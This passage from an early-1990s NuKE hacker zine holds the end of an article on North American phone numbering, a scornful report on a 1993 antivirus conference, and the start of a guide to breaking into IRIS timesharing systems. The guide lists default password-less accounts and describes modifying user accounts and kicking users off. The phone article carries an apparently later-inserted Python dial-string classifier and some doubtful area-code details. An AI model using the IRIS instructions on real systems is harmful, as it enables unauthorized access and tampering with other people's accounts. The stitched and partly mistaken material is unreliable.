which required the fewest number of clicks on a rotary phone? The top five
are:
1. New York City -- 5
2. Chicago/Los Angeles -- 6
3. Dallas/Detroit/Pittsburgh -- 7
4. Philadelphia/St. Louis/Boston/Austin -- 8
5. Cleveland/Syracuse/Milwaukee/Minneapolis -- 9
(This assumes the original area codes as assigned in the fifties, i.e.
212 covers all of New York City, etc.)
% Assignment of exchanges %
~~~~~~~~~~~~~~~~~~~~~~~~~~~
When the telephone was first introduced, central-office operators sat
at switchboards, completing connections in response to spoken requests.
There were few enough phone lines so the operator simply knew where to plug
in for the call. That began to change during an outbreak of the measles in
Lowell, Massachusetts, in 1879. The town doctor feared that if all four
operators fell ill, their substitutes would have trouble connecting people
unless every line got a number. The idea quickly caught on.
In the 1880s telephone service quadrupled in the nation's settled
areas. Cities soon had not only a central office and phone numbers but
exchanges in other parts of town, so callers now asked for Main or
Central plus the subscriber's several-digit number. Branch exchanges
usually took their names from their relative geography, street names,
or names of neighborhoods. Bell devised phonetic tests to help make sure
only easily understood names were chosen. When neighborhood and street
names started to run out, the Bell System recommended new names, like
Evergreen, Lakeside, Poplar, and Walnut.
By the time dialed calling was introduced in the Bell System in 1921,
the exchange names were so ingrained that Bell Telephone kept them on.
William G. Blauvelt of AT&T had divided the alphabet into groups of
three letters for each of the dial's openings in 1917. Z was omitted
because, well, it was the last letter; that left an odd letter to
eliminate. It came down to Q and X, the two most infrequent letters in
English, but Bell finally decided to keep X, since Q could only be followed
by U, limiting the number of possible exchange names. And because a single
phone-number pulse could be transmitted when the receiver lifted or the
finger wheel was jarred, no calls would be initiated until a pulse signal
of at least two was received; thus the number one got no letters attached
to it.
Dialing swept the nation, but only large cities used exchange name
dialing; in small towns one still had only to dial a three- or four-digit
number. (As a side note, why was it that subscriber numbers were never
more than four digits? It's a carry-over from the early days before
direct dialing. It was determined that an operator could not reach more
than 10,000 plugs without getting up from her seat...)
Seven-digit numbers became standard only after World War II. New York
City had pioneered them in the early 1930s when it began inserting an
"exchange-designation number" after the two-letter exchange prefix (for
example, you used to dial RA6-9999 for the RAndolph exchange in Chicago,
with six as the "exchange-designation number"). By the mid-1950s all other
major cities were converted to this system, replacing such combinations as
Chicago's three letters and four digits, Cleveland's two letters and four
digits, and Dallas's one letter and four digits. In 1961 Bell Telephone
announced that it would phase out exchange name dialing city by city.
Pittsburgh and Cincinnati began converting in 1962; Philadelphia and
Seattle were the last to change, in 1978. The classic combination of two
letters and five numbers was a fully national standard for less than a
decade.
The two-letter-five-number system was also used in Canada, though I'm
not sure how widely. Vancouver, British Columbia was one city to use
this system, though I don't how many others did. (Anyone have any
information about this?)
All-number calling was introduced for several reasons. Mainly there
weren't enough workable letter combinations. Exchanges like 571 had
stayed unavailable because letters like JKL (5) and PRS (7) wouldn't
combine. All-number calling also eliminated hard-to-spell exchanges,
prevented mix-ups between similar letters and numbers like O and 0, and made
possible direct dialing from Europe and other parts of the world, where
most phones never had letters on their dials.
For the benefit of those outside of North America, I have included
a diagram of how our phone pads are laid out and which letters are
assigned to which key:
+-------+-------+-------+
|   1   |   2   |   3   |
|       |  ABC  |  DEF  |
+-------+-------+-------+
|   4   |   5   |   6   |
|  GHI  |  JKL  |  MNO  |
+-------+-------+-------+
|   7   |   8   |   9   |
|  PRS  |  TUV  |  WXY  |
+-------+-------+-------+
|   *   |   0   |   #   |
|       |  OPER |       |
+-------+-------+-------+
(Note: the zero key is marked "OPER" because dialing zero will summon
the local operator. Zero and one have no letters officially assigned to
them. Some people like to claim that one is "Q" and zero is "Z", but I
have never seen one or zero used in that fashion before.)
Each area code has certain exchanges set aside for special purposes.
These exchanges are:
555
~~~
Local directory assistance. Dialing NPA-555-XXXX will get you
directory assistance for the given area. This is why most phone
numbers in movies and TV shows are 555-XXXX or KLondike-5 XXXX...
People whose numbers were used in movies, etc. complained to the
studios after getting hundreds of calls from losers asking for
James Bond or whatever. (One family's phone number appeared on the
cover of a heavy metal album and is now suing the band after
receiving thousands of threatening phone calls from fans.)
This use of 555-XXXX is purely a voluntary thing; a long time ago
Bell was able to reserve certain exchanges throughout the country
that producers could safely use, but with a shortage of telephone
exchanges they had to stop this practice.
950
~~~
Used to access other long-distance services. This is called
Feature Group B equal access. To use the service you call their
950 number (which is a free call), then enter your multi-digit PIN,
then dial the number you wish to call. Almost all areas now have
Feature Group D service (Equal Access), where you select an
alternate carrier and then use it normally, like you used to use
AT&T (i.e. just dial 1-NPA-NXX-XXXX). Currently 950s are only used
in the U.S., but they are reserved for future use in Canada and
will probably soon be utilized, given the recent Unitel decision.
Currently Canadian callers must use local dialups for independent
long-distance carriers (called Feature Group A, long phased out in
the United States). (In the U.K. Mercury uses a similar setup.
Mercury phones are equipped to pulse dial 131, enter the customer's
ten-digit PIN touch-tone, then enter the number they're trying to
call, all automatically. This is sort of like 950 access...)
958 and 959
~~~~~~~~~~~
These exchanges are usually reserved for plant testing. In some
areas they may be used for normal service. In most areas other
exchanges are used for testing, too.
976
~~~
976 numbers are like local 1-900 numbers. They are billed on
a per-minute basis, but are usually much less expensive than 900
calls (not more than a dollar or two at most per minute). 976
can usually be blocked (like 900 numbers), sometimes for a fee.
In some areas the telephone company has other exchanges set aside
for 976-type usage; for instance in Pennsylvania the telco has
reserved the 556 exchange for this purpose, and in Texas 703 is
used. Sometimes these other exchanges must be specifically
requested by the customer to be dialed (in other words they default
to blocked).
844
~~~
The 844 exchange used to be used for time (it was TIme-4 under
the old exchange-name system), but the telephone companies figured
why give away this service for free when you can charge $0.50
via a 976 number. Now time is generally found at NPA-976-1616, and
the 844 exchange is available for normal usage. (Interesting note:
in the San Francisco Bay area [408, 415, 510, 707], you can get
the time by dialing "POPCORN", billed as a local call. In New York
and Boston, the number used to be "NERVOUS.")
936
~~~
Like 844, the 936 was once used for pre-recorded messages, only
936 was used for weather announcements (it was WEather-6 in the old
days). This, like time, has been moved to a 976 service in most
places, usually at NPA-976-1212 (and they throw in obnoxious ads to
boot!). Now 936 is usually just a normal exchange.
% Phone capacity %
~~~~~~~~~~~~~~~~~~
The original design of telephone numbers was: (NBX) NNX-XXXX. In
theory, this gives:
 N   B   X    N   N   X    X    X    X    X
 8 * 2 * 10 * 8 * 8 * 10 * 10 * 10 * 10 * 10 = 1.024 billion numbers
However, as some area codes and exchanges are reserved for special
purposes (such as the 411 and 555 exchanges, etc.), the total possible
number of telephone numbers was somewhat less.
As the exchange codes in some area codes were used up, some central
offices started using the NXX format, where the middle digit can then be a
zero or one; this began in New York and Los Angeles and is now used in
almost every area code. Now, telephone numbers look like this:
(NBX) NXX-XXXX. This gives a potential of:
 N   B   X    N   X    X    X    X    X    X
 8 * 2 * 10 * 8 * 10 * 10 * 10 * 10 * 10 * 10 = 1.28 billion numbers
However, codes like 411 and 611 would not be assigned because they
will still be needed for services such as directory assistance and repair.
Nevertheless, some unused N11 codes like 211 may be found in some area
codes as active exchanges. It's also not a good idea to assign the home
area code (or nearby area codes), as this could cause confusion.
Going from NNX exchange codes to NXX only represents a 25% increase in
the total theoretical amount of telephone numbers, and not all area code
regions are expected to run out of exchanges.
The ultimate goal is not only to use area codes for exchange codes,
but to use exchange codes for area codes also. This means that telephone
numbers will ultimately look like this: (NXX) NXX-XXXX. This gives a
potential of:
 N   X    X    N   X    X    X    X    X    X
 8 * 10 * 10 * 8 * 10 * 10 * 10 * 10 * 10 * 10 = 6.4 billion numbers
With a five-fold increase in the number of possible area codes, there
should be plenty of room to grow for some time.
% Placing calls %
~~~~~~~~~~~~~~~~~
Basically, all calls within an area code will ultimately be dialed in
one of the following ways: 1) dial seven digits; 2) dial one plus home
area code plus the local number; or 3) dial one plus the seven digit number
within area code, then wait for a few seconds to time out. One alternative
not mentioned in official documents (for touch tone phones) is to use one
plus seven digit number in home area code then pressing the pound key, with
the pound key terminating the dialing (as in international dialing).
- "1+" is generally used for direct-dialed long distance calls within
North America, especially calls outside the local area code.
Sometimes intra-LATA calls must be dialed 1-NXX-XXXX or even
1-NPA-NXX-XXXX if they're outside your local calling area. Yep,
unlike almost all of the rest of the world, World Zone One uses 1 for
DDD calls instead of the internationally-standard 0.
- "0+" is used to dial operator-assisted or automated credit card calls
within North America. After 0 + (area code) + number are dialed, a
prompt tone (same tones as a dial tone, but for a very short duration)
will be issued, then one of the following actions will be taken:
1) wait for a few seconds, then an operator will come on line; 2) dial
"0" to get the operator immediately (for a collect or person-to-person
call, etc.); or 3) dial the telephone company credit card number for
billing purposes. It is unclear what will happen in the cases of
automated collect calls, as to what kinds of dialing would be standard
in that case. In my area, a computer voice system prompts you for
your name, then dials the number and says "You have a collect call
from [your three-second message]. Press one to accept the charges or
two to reject the call" (or something very close to that). Of course,
this system is open to abuse: probably the most collect calls are
made from a Mr./Ms. "Call me back at NXX-XXXX", etc... Also, this
system is only used for local calls.
- Dialing "0" and waiting will get the local area operator.
- "00" is used in the U.S. to get the operator for a default long
distance carrier. This is used as most long distance companies have
their own operators. A single "0" digit will call up the local
operator (with the local telephone company as opposed to the long
distance company).
- "01" is used for overseas calls. "01+" indicates an operator-assisted
or automatic credit card call, while "011+" indicates a direct-dialed
overseas call. "010+" is reserved for some unspecified future use.
- "10XXX+" is used in the U.S. to indicate which long distance carrier
to use in a situation known as "equal access." This allows a
telephone subscriber to select a long distance company for a
particular call. For instance, "10288+" gets AT&T (288 is ATT...),
while "10222+" gets MCI and "10333+" selects U.S. Sprint. After this
code, a 1 or 0 is dialed (to indicate direct dial or operator-assisted
call), then the number to be called. With this system you can place
a call via another carrier if they offer lower rates, etc. for that
particular call. You get a separate bill in a month or two.
10000 is not available for assignment.
10001 - 10099 are reserved for restricted purposes.
10100 - 10199 are reserved for international carriers.
10200 - 10999 are assigned to standard long distance carriers.
Canada doesn't have to worry about this code yet, though given the
recent changes in long-distance regulation, it's likely that they will
adopt a U.S.-style system soon.
- "11+" is reserved for special calling services like call-waiting
functions, etc. For instance, "1170" is used to disable the
call-waiting. The asterisk or "star" key ("*") can be used instead
of the "11" prefix on touch-tone phones. The current special calling
codes on many local telephone systems are:
*57 - call tracing request (some systems use this for call back)
*60 - call blocking activated
*61 - priority ring activated
*63 - select call forwarding activated
*66 - repeat dialing activated
*67 - call number ID blocking (must be dialed before each call)
*69 - call return activated
*70 - disable call waiting
*71 - three-way calling according to usage
*72 - enable call forwarding
*73 - disable call forwarding
*74 - modify speed calling directory entry (for 8 # service)
*75 - modify speed calling directory entry (for 30 # service)
*76 - call pickup
*79 - ring again
*80 - call blocking disabled
*81 - priority ring disabled
*83 - select call forwarding activated
*86 - repeat dialing disabled
*89 - call return disabled
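The prefix rules in this section, the reserved exchanges listed earlier, the keypad letter
assignments and the capacity arithmetic can all be checked mechanically. The Python below is
an added example written for this reprint; it is not code from the article or from any
telephone company, and the function names (letters_to_digits, rotary_clicks, plan_capacity,
classify) and the descriptive labels they return are this example's own choices. It translates
exchange-name dialing (capital letters are the dialed ones, as in the article's "RAndolph"
notation), counts rotary clicks, computes the theoretical capacity of the NBX/NXX patterns,
and labels a dial string by the 0/00/01/011/10XXX/11 rules above. The "interchangeable" flag
relaxes the N[01]X area-code test to NXX, matching the interchangeable codes described later
in the article. Area code 212 and carrier code 288 are the ones the article itself cites.

```python
"""Dial-string classifier for the World Zone One numbering plan as this
article describes it.  Added example; none of this is the article's own code."""
import re

# Letter assignments from the keypad diagram above (Q and Z have no key).
KEYPAD = {"2": "ABC", "3": "DEF", "4": "GHI", "5": "JKL",
          "6": "MNO", "7": "PRS", "8": "TUV", "9": "WXY"}
LETTER_TO_DIGIT = {c: d for d, letters in KEYPAD.items() for c in letters}

# Exchanges the article says are set aside in every area code.
SPECIAL_EXCHANGES = {"555": "directory assistance", "950": "Feature Group B access",
                     "958": "plant test", "959": "plant test", "976": "pay-per-call"}

def letters_to_digits(s):
    """Translate exchange-name dialing to digits.  Capital letters are the ones
    dialed, as in the article's 'RAndolph' notation: 'RA6-9999' -> '7269999'.
    Lower-case letters and separators are dropped; Q and Z raise ValueError."""
    out = []
    for c in s:
        if c.isdigit():
            out.append(c)
        elif c.isupper():
            if c not in LETTER_TO_DIGIT:
                raise ValueError(f"{c} is not on the dial")
            out.append(LETTER_TO_DIGIT[c])
    return "".join(out)

def rotary_clicks(code):
    """Pulses a rotary dial sends for a code: 1-9 send that many, 0 sends ten."""
    return sum(10 if c == "0" else int(c) for c in code if c.isdigit())

def plan_capacity(pattern):
    """Theoretical number count for a pattern such as 'NBX NNX-XXXX'
    (N: 2-9, eight values; B: 0 or 1, two values; X: any digit, ten values)."""
    sizes = {"N": 8, "B": 2, "X": 10}
    total = 1
    for ch in pattern:
        total *= sizes.get(ch, 1)
    return total

def valid_npa(code, interchangeable=False):
    """Area codes are N[01]X under the current plan; interchangeable codes are NXX."""
    if not re.fullmatch(r"[2-9][0-9][0-9]", code):
        return False
    return interchangeable or code[1] in "01"

def exchange_kind(code):
    """'ordinary', 'N11 service', one of the special purposes above, or 'invalid'."""
    if not re.fullmatch(r"[2-9][0-9][0-9]", code):
        return "invalid"
    if code[1:] == "11":
        return "N11 service"
    return SPECIAL_EXCHANGES.get(code, "ordinary")

def carrier_code_kind(cic):
    """Category of a 10XXX carrier identification code per the article's table."""
    n = int(cic)
    if n == 0:
        return "not available"
    if n < 100:
        return "restricted"
    if n < 200:
        return "international carrier"
    return "long distance carrier"

def classify(dialed, interchangeable=False):
    """Describe what a dial string means under the plan's prefix rules."""
    if dialed.startswith("*"):               # star key stands in for the 11 prefix
        d = "11" + letters_to_digits(dialed[1:])
    else:
        d = letters_to_digits(dialed)
    if d == "0":
        return "local operator"
    if d == "00":
        return "long distance carrier operator"
    if d.startswith("011"):
        return "international direct dial"
    if d.startswith("010"):
        return "reserved prefix 010"
    if d.startswith("01"):
        return "international operator-assisted"
    if d.startswith("11") and len(d) == 4:
        return f"special calling code {d[2:]}"
    if d.startswith("10") and len(d) >= 5:   # 10XXX equal-access carrier code
        rest = classify(d[5:], interchangeable) if d[5:] else "no number"
        return f"carrier {d[2:5]} ({carrier_code_kind(d[2:5])}) then {rest}"
    if d[:1] in ("0", "1") and len(d) == 11:  # 1+ or 0+ with area code
        npa, nxx = d[1:4], d[4:7]
        if not valid_npa(npa, interchangeable):
            return f"invalid area code {npa}"
        how = "direct-dialed" if d[0] == "1" else "operator-assisted"
        return f"{how} call to {npa}, {exchange_kind(nxx)} exchange {nxx}"
    if d.startswith("1") and len(d) == 8:    # 1+ seven digits, home area code
        return f"1+ call within home area code, {exchange_kind(d[1:4])} exchange {d[1:4]}"
    if len(d) == 7:
        return f"local call, {exchange_kind(d[:3])} exchange {d[:3]}"
    return "unrecognized"
```

The prefix tests are ordered the way the plan itself disambiguates them: because an area
code never begins with 0 or 1, a "10" or "11" after the leading 1 can only be a carrier
code or a special calling code, and a "0" followed by 1 can only be an international or
reserved prefix. The classifier leans on that property instead of on string length alone.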
% International dialing %
~~~~~~~~~~~~~~~~~~~~~~~~~
International Direct Distance Dialing (011+/01+ dialing) began in 1970
between New York and London, and has since become available in all service
areas in North America. Over 99% of the world's telephones are reachable
from the United States and Canada. According to AT&T, the only areas
which require operator assistance to reach are: Afghanistan, Burma, Cuba,
Easter Island, Laos, Niue, Norfolk Island, Somalia, Spanish Sahara, Sudan,
Tuvalu, Vanuatu, Wallis and Futuna, and Yemen. From Canada, calls can be
direct-dialed to Cuba and Burma (the U.S. government doesn't permit any
calls to there, even though the capability exists). North Korea cannot
be dialed at all, period, even with an operator; not only do they have a
primitive phone system and are politically shunned, they also just changed
everyone's phone number, so no one can dial in and spread evil Capitalist
propaganda. (There are no phone books in North Korea -- that's classified
information. Seriously.)
As you can see, most of the non-direct-dialable numbers are small
Pacific islands; these calls aren't direct-dialable because the only trunks
to these countries are generally to Australia or other Pacific countries,
and AT&T is only allowed to use the trunks for an hour or two each day.
Other countries just have phone systems in such awful condition that they
can't be dialed easily (Laos, Sudan, etc.), while Cuba and Burma are banned
in the U.S. for political reasons. Within a few years, the capability to
direct-dial all telephones in the world should exist. Already IDDD exists
to certain research bases in Antarctica, Mongolia, and other places you'd
never even *want* to call. It's only a matter of time, now...
% The future of World Zone One %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
On January 1, 1995 all telephone systems are expected to change their
equipment over to allow for new "interchangeable" area codes (area codes
whose second digits are not one or zero). This date was originally to be
July 1, 1995 but was moved up to January because of increasing demand for
phone numbers due to fax, modem, and cellular phones.
The initial set of new area codes will take the form NN0, or those
numbers ending in zero. This means that area codes that do not have
exchanges ending in zero (or only a few NN0 exchanges that could be
renumbered) can still be able to tell the difference between an exchange
and an area code by looking at the first three digits. The new NN0-type
area codes will be assigned starting with these first few codes (in order):
260, 480, 520, 590, 650, 220, 250, 490, 660, 680, 720, 730, 850, and 940.
The 970 NPA will be reserved for phone testing purposes, and will not
become an area code. New area codes may be assigned as follows:
geographic codes will use N2X and N3X, N4X through N7X will be used for
expansion, and N8X and N9X will be used for non-geographic codes. (In this
notation N represents a digit from 2 to 9, and X represents any digit.)
Thus, area codes like 223, 734, or 520 would be geographic codes under the
proposal, while area codes like 987, 294, or 780 would be non-geographic
(like 700/800/900 numbers are now). This middle digit of the area code is
referred to as the "B" digit, thus the B digit indicates a new geographic
or non-geographic code. As the initial set of geographic or non-geographic
codes are used up, expansion takes place by using the nearest available
expansion set. Thus, N4X codes are next in line for geographic codes
expansion, while N7X codes are next for non-geographic expansion.
Ultimately, expansion to more digits will be needed in the distant future,
and it is proposed that either the N5X or N6X codes can be used to provide
for "expansion" codes to set up a numbering plan of more than ten digits.
In addition to the new area codes, the Carrier Identification Code
format of 10XXX+ will be expanded to 101XXXX+ in the near future, because
nearly all of the 10XXX codes are assigned at this time.
On December 31, 1996 (referred to as "Time T"), there will be an
expansion of the maximum international number length from twelve digits to
fifteen digits, according to a CCITT recommendation. Already one country
has moved to fourteen digit numbers, and more such plans are likely in the
future; in order to continue to permit direct dialing to such countries,
the maximum number of digits allowed for IDD calls must be increased to at
least fifteen.
Also, it has been recommended that the North American phone system
evolve to ten-digit dialing for station-to-station (network based) calls,
including local calls. The idea is to start in the metropolitan areas
using "overlay" NPA codes like New York and perhaps other areas soon. It
is also proposed that 1+ be eliminated as a long-distance access prefix; in
other words, any call in North America would consist of ten digits, whether
local, long distance, or to an 800/900-type service. In effect, everyone
will have a ten-digit phone number, instead of a seven-digit phone number
and a three-digit area code, as under the current plan.
Who will get the first interchangeable area code? No one knows for
certain, but by observing the number of exchanges in each area we can make some
educated guesses. Alabama (205) and Arizona (602) both will need new NPAs
very soon, as will 206 (western Washington), 703 (Houston area) and [gasp!]
708 (suburban Chicago). One of these five areas will almost certainly get
the first code. Some claim it will be 708... An Illinois Bell operator
denies this (but remember, this is an IBT operator here, not someone who
knows what they're talking about). There is also a rumour that the next
split will occur somewhere in Florida, though this seems unlikely as none
of Florida's NPAs are running out of numbers and other areas need them much
more urgently. Only time will tell.
% Conclusion %
~~~~~~~~~~~~~~
Well folks, I hope this information has been of use to you. The
telephone system can be a fascinating thing (and I'm not just talking about
phreaking here), and I encourage you to learn more on your own. Also, look
for more articles about the world telecommunications network in future NuKE
InfoJournals. I'd also like to take the time to give credit where credit
is due: some of the information in this article was gleaned from the
comp.dcom.telecom newsgroup on the Usenet and the Telecom Digest archives
at lcs.mit.edu, with other bits coaxed from IBT and AT&T operators,
borrowed from other text files, and written from personal knowledge and
outside research. Enjoy, everyone.
Nowhere Man/NuKE
===============================================================================
===============================================================================
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "National Computer Security Association (NCSA) -N
E- Cover Report" Nu
-N uK
Nu By KE
uK Throbbing Grisle E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% NCSA San Francisco Conference January 1993 %
Yes, that's right, I got in at the National Computer Security Association's
Conference pertaining to computer security in general and viruses in
particular. Thanks goes out to my University professor for giving me his
unwanted complimentary tickets (way to go, Les!). Since I was on semester
break, I called my friend C.K. and we were off, to what is affectionately
known in the bay area as, "The City."
This would not be that big of a deal, except that the list of speakers reads
like a who's who of the anti-viral industry. We started off with a
lecture by the Man himself, Mr. John McAfee.
What can we say about this guy? Well, we noticed that John is like the
Hugh Hefner of the AV (AntiVirus) world. He comes in very well dressed,
very confident, and can get away with saying the most inaccurate pieces
of crap and the crowd eats it up like it's ice cream! At one point in his
lecture, John stated that the Dir II virus "infects the FAT". Huh?!?!
Tell the truth, John. You ain't no programmer. When was the last time you
typed in "#include <stdio.h>"? Bet you never have.
But the ironic thing about the whole show is that there are guys there who
know way more about viruses, even have better products out on the market, but
who aren't nearly as successful. Does that mean there was McAfee bashing
going on? Naw...no resentment here! [NOT]
The next lecture C.K. and I went to, after a long and greasy brunch, was
David Stang. "David Who?" you might ask? Well, I never heard of him before
either, but he claims to have started the NCSA (wow - what an accomplishment)
and then left it (left or kicked out?) but comes back to give lectures
(no hard feelings, right?) Well, anyway, he was there to sell his Virus
Analysis Machine, which consisted of the same ol' bait files, a little bit
of checking (where is the code placed??), and then it runs the file through
Sourcer. I would have thought he could have written his own disassembler, one
specifically for viruses. We decided that it would not even be worth pirating.
You can bet the other programmers in the audience thought the same thing.
Well, we decided to wrap up the day's festivities (before going out into the
San Francisco night to party) by attending Alan Solomon's lecture. He is
the good doctor from Doctor Solomon's Anti-Virus Tool Kit. This guy is the
kind of Brit that would extract a fee from the US and Canada for using the
English Language. Tight? You probably couldn't get dental floss through his
`arsehole.' He gets up there waving his arm, making snide comments about
everybody and everything (with side implications to McAfee; I get the feeling
these two would not make good roommates). Then he talks about CARO, being the
`Saviour of the world.'
CARO, from what I could gather from the conference, is a group of virus
researchers that happens to include Alan Solomon and Fridrik Skulason (maker
of F-Prot AntiVirus). The way these guys talk about their group, I thought I
was listening to a YAM conference! They really think their group has made a
Difference and they are the only protectors against viruses that matter. I
turned to a very attractive girl who was sitting nearby (must have been from
Marketing) and asked, "Is McAfee part of CARO?", to which she rolled her
eyes and said, "Are you kidding? They hate each other."
With these amazing memories etched in our minds, we wandered out into the
harsh city for a night of over-indulgence. So much so, we couldn't get up
the next day until noon (well, we _were_ on semester break!) We made it up
for the middle of someone else's lecture (I can't remember who it was -
he had an accent and spoke about how to disassemble viruses. Did I learn
anything? Did I care?)
Okay, we found that boring enough so we went to the exhibit. Did you know
people are still working on hardware solutions for viruses? The girl was
pretty cute at the booth, so I became overly interested in their shitty
product, asking questions like "Gee, so I wouldn't need any updates?"
"Oh no, not with our product", she purred. Yeah, Right.
Then we went to a panel discussion where the Good Dr. Solomon and three
other guys were talking about the teenage personality distortion patterns
of the virus writer/hacker. Nothing new here. We're all suicidal virgins,
y'know. (Even though many of us are married with kids, and I presume the
rest did pass their puberty stage. Come on, where are you getting this info?)
The last seminar was given by Fridrik Skulason. This guy is all the way
from Iceland. (Iceland? They have computers up there? Better yet, `When
did they learn to type?') If Solomon is the Arch Enemy of McAfee, Skulason
would have been McAfee in an anti-matter universe. What the hell does that
mean? It means that McAfee is dark, tall and slim. Fridrik is pale, blond
and pudgy. McAfee is an effective speaker (Imposing his Reign of Error);
Fridrik is quiet. I mean _real_ quiet. C.K. wanted to set the guy on fire
just to see if he could let out a loud yell. John McAfee has Charisma!
Fridrik has facts and knows what the hell he is talking about. (Big Deal? huh?)
So here is what I could conclude from the conference;
a) AntiVirus is a big business, McAfee still is the heavyweight champ, but
there are a lot of contenders out there that want to knock out the chump,
er, champ. However, there is a fallout coming, where only the strong will
survive. It is not a time or place for a company to start any more; XTREE's
recent failure was cited as an example of that.
b) The AntiVirus world is much more `cliquish' than I would have thought. Kind
of reminds me of high school. Some people won't talk to others. Amusing.
c) The AntiVirus world is scared. The sheer number of new viruses is increasing
exponentially, overtaking some scanners. VCL was mentioned, as well as
MPC as the new trend that threatens the AV developer. A fall out is
predicted in this business.
Any last parting shots? You Bet!
David Stang: Have you ever thought of selling real estate?
Fridrik Skulason: Try charging a little more for F-Prot and take a vacation;
you need the sun.
John McAfee: Keep making VIRUSHAM, but sock the money away. Your days are
numbered.
Throbbing Grisle
================================================================================
================================================================================
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "Interactive Realtime Information Service (IRIS) -N
E- Guide" Nu
-N uK
Nu By KE
uK Ned239 E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% IRIS R9.1.3A Introduction %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Hello Everybody, I would like to know what has happened to the hacking world.
Now it's basically dead, at least in most areas I know of. I hope to change
that. Anyway, here is some info on a relatively old system called IRIS, or
Interactive Realtime Information Service. This system was originally meant
to run on older systems like PDP-8 and PDP-11. Due to the versatile nature
of IRIS, today a lot more systems run it. IRIS systems usually can be reached
at 1200 7E1 and after pressing either ESCape or Enter a few times, you should
see something like this as a greet:
-=-
Welcome to "IRIS" R9.1.3A timesharing !
ACCOUNT ID ?
-=-
Or sometimes it will say what you have reached under the welcome line. IRIS
is also extremely hacker-friendly as it will let you type account names for
as long as you want. Also when you guess an account there are no passwords on
them. At first you will not see what you type, to change this type Control-E
to turn the echo on. Try CAPSLOCK also.
-=-
DEFAULT ACCOUNTS
----------------
MANAGER (Good System Access)
NO NAME (Normal User)
DEMO (Try the other ones first)
PDP8 /
PDP11 < == All General Accounts
SOFTWARE \
Hopefully you're in there with one of those accounts. Now, then you will get
a # prompt. If you are on with an account of access level 3, then you will
be able to use a user maintenance program by typing either ACCOUNTS or
ACCOUNT UTILITY. You should get:
-=-
(0) EXIT TO SYSTEM
(1) ADD NEW ACCOUNT
(2) MODIFY ACCOUNT
(3) DELETE ACCOUNT
(4) INQUIRE ACCOUNT
(5) LIST THE ACCOUNTS
Ah, I wasn't able to create an account, but I did modify several. Basically
this is pretty straightforward.
-=-
Ok, after you're done playing with the accounts and exit properly, there are
a lot of interesting features on this IRIS. On one particular system that I
use often you have several utilities such as spreadsheets, word processors
and even an ASM program. You can get a list of all the things to do by typing
LIBR at the # prompt. For most of the filenames you type, the response will be
"NOT A PROCESSOR", since most of the IRIS software was written in business
BASIC. Type BASIC LOAD <Filename>. Here are some of the most interesting
programs.
PP or PORT ALL MONITOR will let you see who else is using the system. If
for some reason you want to kick off a user, type PPP and then the user name.
Also, if you want to see your own status, type PROT.STAT.
If you need help with something, try typing GUIDE and it will give you a short
menu of all the help files available. Too bad there usually aren't many.
Another interesting utility to use is BLOCKCOPY; since I am not completely
used to it, I will show you what the guide said:
INTERACTIVE PROGRAM GUIDES
FOR IRIS CONFIGURATION AND SETUP
TOPIC # FOR INFORMATION ON:
1 BLOCKCOPY
THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER
THEY DESCRIBE THE ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO
MAKE THE CHANGES YOU DESIRE. 'BEFORE' YOU ACTUALLY DO MAKE THE
SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP YOUR SYSTEM'.
REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR.
ENTER TOPIC # 1
INTRODUCTORY COMMENTS ON USING BLOCKCOPY
PRINT HERE OR $LPT (C/R OR $) :
INTERACTIVE PROGRAM GUIDE ON SETTING UP BLOCKCOPY
INTRODUCTION
BLOCKCOPY IS A STAND-ALONE UTILITY PROGRAM WHICH GIVES GREAT
FLEXIBILITY IN COPYING ANY PART OF ONE DISC TO ANY PART OF
ANOTHER, EVEN ONTO A DIFFERENT DISC CONTROLLER.
BLOCKCOPY DOES NOT PROVIDE FAST PERFORMANCE, BUT IT CAN BE VERY
USEFUL IN SPECIAL CASES. EXAMPLES:
1) YOU CAN COPY A SINGLE LOGICAL UNIT FROM ONE PACK TO ANOTHER,
WITHOUT OVERWRITING OTHER LOGICAL UNITS ALREADY ON THE
DESTINATION.
2) IF YOU HAVE BOTH LARGE STORAGE MODULES AND SMALLER CARTRIDGE
DRIVES ON THE SAME SYSTEM, YOU CAN BACKUP YOUR SYSTEM LOGICAL
UNIT 0 FROM STORAGE MODULE ONTO A CARTRIDGE PACK WHICH CAN
BE SET ASIDE AS A DEDICATED SYSTEM BACKUP.
3) IF YOU HAVE A SPECIAL SWAPPING DISC, IT CAN BE BACKED
UP TO AND RESTORED FROM OTHER STORAGE MODULES.
PRESS RETURN WHEN READY TO GO ON
LIMITATIONS
NOTE THAT WHILE YOU CAN COPY FROM ONE TYPE OF DISC CONTROLLER
TO ANOTHER, THE RESULT MAY NOT BE INSTALLABLE UNDER
IRIS BECAUSE OF SOME DISC ADDRESS CONSIDERATIONS.
ALSO NOTE THAT YOU MAY NOT SPECIFY A DESTINATION WHICH
PHYSICALLY OVERLAPS THE SOURCE ON THE SAME PACK.
SETUP
FIRST, HAVE AT HAND YOUR R9.0 PERIPHERALS HANDBOOK.
NOTICE THAT FOR EACH TYPE OF DISC, THERE IS A DIFFERENT VALUE
FOR THE BZUD POINTER.
ALSO NOTICE THAT IT GIVES YOU FORMULAS TO COMPUTE VALUES CALLED PHYU.
FIND THE APPROPRIATE DISC SPECIFICATION SHEET(S) DESCRIBING
YOUR SOURCE (WHERE YOU ARE COPYING BLOCKS FROM) AND YOUR
DESTINATION (WHERE YOU ARE COPYING BLOCKS TO). THE SOURCE
AND DESTINATION DO NOT HAVE TO BE THE SAME TYPE OF CONTROLLER.
PRESS RETURN WHEN READY TO GO ON
NOTE: ALL REQUESTED VALUES/CALCS IN OCTAL UNLESS OTHERWISE NOTED.
ALL VALUES ON DISC SPECIFICATION SHEETS ARE IN OCTAL.
ENTER THE FOLLOWING VALUES FOR THE SOURCE:
